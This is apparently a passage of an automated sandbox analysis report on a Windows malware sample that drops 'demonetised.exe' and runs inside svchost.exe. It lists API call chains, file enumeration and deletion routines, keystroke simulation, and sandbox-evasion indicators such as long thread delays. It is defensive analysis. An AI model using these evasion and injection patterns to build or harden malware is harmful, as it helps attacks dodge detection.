                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exe | Code function: 2_2_00D3EB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 2_2_00D3EB42
                  Source: C:\Users\user\Desktop\B7N48hmO78.exe | Code function: 0_2_00E0123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00E0123A
                  Source: C:\Users\user\Desktop\B7N48hmO78.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\svchost.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exe Process information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exe API/Special instruction interceptor: Address: 133C4AC
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exe API/Special instruction interceptor: Address: 18205F4
                  Source: C:\Windows\SysWOW64\svchost.exe Memory allocated: 52D0000 memory reserve | memory write watch
                  Source: C:\Windows\SysWOW64\svchost.exe Memory allocated: 52D0000 memory reserve | memory write watch
                  Source: C:\Windows\SysWOW64\svchost.exe Memory allocated: 72D0000 memory reserve | memory write watch
                  Source: C:\Windows\SysWOW64\svchost.exe Memory allocated: 51A0000 memory reserve | memory write watch
                  Source: C:\Windows\SysWOW64\svchost.exe Memory allocated: 51A0000 memory reserve | memory write watch
                  Source: C:\Windows\SysWOW64\svchost.exe Memory allocated: 71A0000 memory reserve | memory write watch
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear, 3_2_004019F0
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 600000
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 599808
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 599688
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 599578
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 599469
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 599359
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 599250
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 599126
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 599000
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 598890
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 598781
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 598672
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 598563
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 598453
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 598344
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 598234
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 598125
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 598016
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 597906
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 597797
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 597687
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 597578
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 597441
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 597281
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 597140
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 597031
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 596922
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 596813
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 596703
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 596594
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 596484
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 596375
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 596266
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 596156
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 596047
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 595938
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 595813
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 595688
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 595563
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 595453
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 595339
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 595234
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 595125
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 595016
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 594891
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 594781
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 594571
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 594469
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 594360
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 594235
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 594110
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 593985
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 600000
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 599875
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 599766
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 599652
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 599547
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 599437
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 599328
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 599217
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 599109
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 599000
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 598859
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 598737
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 598536
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 598406
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 598296
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 598186
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 598073
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 597969
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 597844
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 597734
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 597623
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 597515
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 597406
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 597297
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 597187
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 597077
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 596969
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 596859
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 596750
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 596641
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 596516
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 596391
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 596281
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 596172
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 596062
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 595953
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 595844
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 595734
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 595625
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 595516
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 595391
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 595266
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 595156
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 595047
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 594937
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 594828
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 594718
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 594609
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 594500
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 594390
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 594281
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 594172
                  Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 594062
                  Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
                  Source: C:\Windows\SysWOW64\svchost.exe Window / User API: threadDelayed 2091
                  Source: C:\Windows\SysWOW64\svchost.exe Window / User API: threadDelayed 7743
                  Source: C:\Windows\SysWOW64\svchost.exe Window / User API: threadDelayed 6472
                  Source: C:\Windows\SysWOW64\svchost.exe Window / User API: threadDelayed 3364
                  Source: C:\Users\user\Desktop\B7N48hmO78.exe Evaded block: after key decision graph_0-94260
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exe Evaded block: after key decision
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exe Evaded block: after key decision
                  Source: C:\Users\user\Desktop\B7N48hmO78.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_0-95143
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                  Source: C:\Users\user\Desktop\B7N48hmO78.exe API coverage: 4.5 %
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exe API coverage: 4.8 %
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432 Thread sleep count: 32 > 30
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432 Thread sleep time: -29514790517935264s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432 Thread sleep time: -600000s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 4308 Thread sleep count: 2091 > 30
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432 Thread sleep time: -599808s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432 Thread sleep time: -599688s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 4308 Thread sleep count: 7743 > 30
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432 Thread sleep time: -599578s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432 Thread sleep time: -599469s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432 Thread sleep time: -599359s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432 Thread sleep time: -599250s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432 Thread sleep time: -599126s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432 Thread sleep time: -599000s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432 Thread sleep time: -598890s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432 Thread sleep time: -598781s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432 Thread sleep time: -598672s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432 Thread sleep time: -598563s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432 Thread sleep time: -598453s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432 Thread sleep time: -598344s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432 Thread sleep time: -598234s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432 Thread sleep time: -598125s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432 Thread sleep time: -598016s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432 Thread sleep time: -597906s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432 Thread sleep time: -597797s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432 Thread sleep time: -597687s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432 Thread sleep time: -597578s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432 Thread sleep time: -597441s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432 Thread sleep time: -597281s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432 Thread sleep time: -597140s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432 Thread sleep time: -597031s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432 Thread sleep time: -596922s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432 Thread sleep time: -596813s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432 Thread sleep time: -596703s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432 Thread sleep time: -596594s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432 Thread sleep time: -596484s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432 Thread sleep time: -596375s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432 Thread sleep time: -596266s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432 Thread sleep time: -596156s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432 Thread sleep time: -596047s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432 Thread sleep time: -595938s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432 Thread sleep time: -595813s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432 Thread sleep time: -595688s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432 Thread sleep time: -595563s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432 Thread sleep time: -595453s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432 Thread sleep time: -595339s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432 Thread sleep time: -595234s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432 Thread sleep time: -595125s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432 Thread sleep time: -595016s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432 Thread sleep time: -594891s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432 Thread sleep time: -594781s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432 Thread sleep time: -594571s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432 Thread sleep time: -594469s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432 Thread sleep time: -594360s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432 Thread sleep time: -594235s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432 Thread sleep time: -594110s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432 Thread sleep time: -593985s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064 Thread sleep count: 34 > 30
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064 Thread sleep time: -31359464925306218s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064 Thread sleep time: -600000s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064 Thread sleep time: -599875s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7060 Thread sleep count: 6472 > 30
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064 Thread sleep time: -599766s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7060 Thread sleep count: 3364 > 30
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064 Thread sleep time: -599652s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064 Thread sleep time: -599547s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064 Thread sleep time: -599437s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064 Thread sleep time: -599328s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064 Thread sleep time: -599217s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064 Thread sleep time: -599109s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064 Thread sleep time: -599000s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064 Thread sleep time: -598859s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064 Thread sleep time: -598737s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064 Thread sleep time: -598536s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064 Thread sleep time: -598406s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064 Thread sleep time: -598296s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064 Thread sleep time: -598186s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064 Thread sleep time: -598073s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064 Thread sleep time: -597969s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064 Thread sleep time: -597844s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064 Thread sleep time: -597734s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064 Thread sleep time: -597623s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064 Thread sleep time: -597515s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064 Thread sleep time: -597406s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064 Thread sleep time: -597297s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064 Thread sleep time: -597187s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064 Thread sleep time: -597077s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064 Thread sleep time: -596969s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064 Thread sleep time: -596859s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064 Thread sleep time: -596750s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064 Thread sleep time: -596641s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064 Thread sleep time: -596516s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064 Thread sleep time: -596391s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064 Thread sleep time: -596281s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064 Thread sleep time: -596172s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064 Thread sleep time: -596062s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064 Thread sleep time: -595953s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064 Thread sleep time: -595844s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064 Thread sleep time: -595734s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064 Thread sleep time: -595625s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064 Thread sleep time: -595516s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064 Thread sleep time: -595391s >= -30000s
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064Thread sleep time: -595266s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064Thread sleep time: -595156s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064Thread sleep time: -595047s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064Thread sleep time: -594937s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064Thread sleep time: -594828s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064Thread sleep time: -594718s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064Thread sleep time: -594609s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064Thread sleep time: -594500s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064Thread sleep time: -594390s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064Thread sleep time: -594281s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064Thread sleep time: -594172s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7064Thread sleep time: -594062s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\B7N48hmO78.exe Code function: 0_2_00E26CA9 GetFileAttributesW,FindFirstFileW,FindClose, 0_2_00E26CA9
                  Source: C:\Users\user\Desktop\B7N48hmO78.exe Code function: 0_2_00E260DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose, 0_2_00E260DD
                  Source: C:\Users\user\Desktop\B7N48hmO78.exe Code function: 0_2_00E263F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose, 0_2_00E263F9
                  Source: C:\Users\user\Desktop\B7N48hmO78.exe Code function: 0_2_00E2EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_00E2EB60
                  Source: C:\Users\user\Desktop\B7N48hmO78.exe Code function: 0_2_00E2F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_00E2F5FA
                  Source: C:\Users\user\Desktop\B7N48hmO78.exe Code function: 0_2_00E2F56F FindFirstFileW,FindClose, 0_2_00E2F56F
                  Source: C:\Users\user\Desktop\B7N48hmO78.exe Code function: 0_2_00E31B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00E31B2F
                  Source: C:\Users\user\Desktop\B7N48hmO78.exe Code function: 0_2_00E31C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00E31C8A
                  Source: C:\Users\user\Desktop\B7N48hmO78.exe Code function: 0_2_00E31F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_00E31F94
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exe Code function: 2_2_00D66CA9 GetFileAttributesW,FindFirstFileW,FindClose, 2_2_00D66CA9
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exe Code function: 2_2_00D660DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose, 2_2_00D660DD
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exe Code function: 2_2_00D663F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose, 2_2_00D663F9
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exe Code function: 2_2_00D6EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 2_2_00D6EB60
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exe Code function: 2_2_00D6F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 2_2_00D6F5FA
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exe Code function: 2_2_00D6F56F FindFirstFileW,FindClose, 2_2_00D6F56F
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exe Code function: 2_2_00D71B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 2_2_00D71B2F
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exe Code function: 2_2_00D71C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 2_2_00D71C8A
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exe Code function: 2_2_00D71F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 2_2_00D71F94
                  Source: C:\Users\user\Desktop\B7N48hmO78.exe Code function: 0_2_00DFDDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_00DFDDC0
                  Source: svchost.exe, 00000006.00000002.4523361245.0000000003054000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllB
                  Source: svchost.exe, 00000003.00000002.4523195747.0000000003054000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
